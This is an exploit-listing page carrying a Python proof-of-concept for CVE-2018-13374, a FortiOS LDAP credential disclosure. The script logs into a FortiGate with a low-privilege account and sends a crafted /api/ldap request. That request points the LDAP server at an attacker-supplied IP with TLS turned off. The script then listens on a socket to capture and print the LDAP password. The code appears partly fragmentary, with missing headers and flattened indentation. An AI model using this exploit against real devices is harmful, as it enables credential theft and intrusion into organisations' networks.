Exploits / Vulnerability Discovered : 2019-01-16 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Fortigate fortios < 6.0.3 ldap credential disclosure is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#/usr/bin/python3
"""
CVE-2018-13374
Publicado por Julio Ureña (PlainText)
Twitter: @JulioUrena
Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
Referencia: https://fortiguard.com/psirt/FG-IR-18-157
# Create json object for the vulnerable request, changing the server and setting up secure to 0
ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}}
# Trigger the vulnerability
r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)
r.close()
while True:
print('[+] Waiting Fortigate connection ...')
c, client_address = sock.accept()
try:
while True:
data = c.recv(1024)
credentials = str(data)
# \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference.
# It separe the username and the password
ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")
print("[+] Password: ", ldap_pass[3:-1])
break
finally:
c.shutdown(socket.SHUT_RDWR)
c.close()
sock.shutdown(socket.SHUT_RDWR)
sock.close()
if credentials:
break
def print_help(self, param, value):
if value is False:
return
click.echo(self.get_help())
self.exit()
@click.command()
@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
@click.pass_context
def main(self, fortigate_url, username, password, ip, proxy):
if not fortigate_url and not username and not password:
print_help(self, None, value=True)
print("[-] For usage reference use --help")
exit(0)
# Configure Proxy For Web Requests
proxy_addr = {
'http': proxy,
'https': proxy
}
message = """[+] CVE-2018-13374
[+] Publicado por Julio Ureña (PlainText)
[+] Blog: https://plaintext.do
[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
"""
print(message)
if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):
print("[+] Logged in.")
sleep(1)
TriggerVuln(str(fortigate_url), ip, proxy_addr)
else:
print("[-] Unable to login. Please check the credentials and Fortigate URL.")
exit(0)